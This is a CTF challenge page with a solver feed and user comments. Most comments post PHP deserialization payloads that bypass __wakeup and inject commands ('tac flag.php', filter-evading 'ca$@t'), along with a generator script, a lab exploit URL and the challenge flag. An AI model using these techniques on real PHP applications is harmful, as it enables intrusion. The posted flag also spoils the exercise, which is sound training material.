评分(4)
解题动态
hbynb 攻破了该题 1天前
不知道不晓得 攻破了该题 1天前
Zhengzanmei 攻破了该题 2天前
邪恶的番茄 攻破了该题 2天前
out不慢 攻破了该题 3天前
铭风 攻破了该题 3天前
zrc2682 攻破了该题 4天前
辛笙 攻破了该题 4天前
ycwh 攻破了该题 7天前
cccczz 攻破了该题 8天前
Blmn 攻破了该题 9天前
caocao 攻破了该题 10天前
ysy126 攻破了该题 12天前
南交混的入朱靖宇 攻破了该题 12天前
zzt1 攻破了该题 14天前
奔跑的开开 攻破了该题 14天前
对对对对对对对对 攻破了该题 15天前
几道达瓦 攻破了该题 15天前
zhenmingshui 攻破了该题 16天前
评论
18956160518 1年前
举报
https://blog.csdn.net/m0_57954651/article/details/127866733
EtHat 2年前
举报
O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
xht0525 2年前
举报
nl flag.php|base64
不会编程的崽 2年前
举报
<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>
不会编程的崽 2年前
举报
O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
c41vin 2年前
举报
0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6
wxy1343 2年前
举报
http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}
wxy1343 2年前
举报
flag{Unser1alize_and_2CE_Add}
yuanyipaceandlove 2年前
举报
class ctf { protected $username = 'admin' ; protected $cmd = 'ca$@t flag.php' ; } $a = new ctf(); $a = serialize($a); $a = str_replace(':2:{',':3:{',$a); $a=urlencode($a); echo $a;
15683956189 3年前
举报
特别要注意下url编码的问题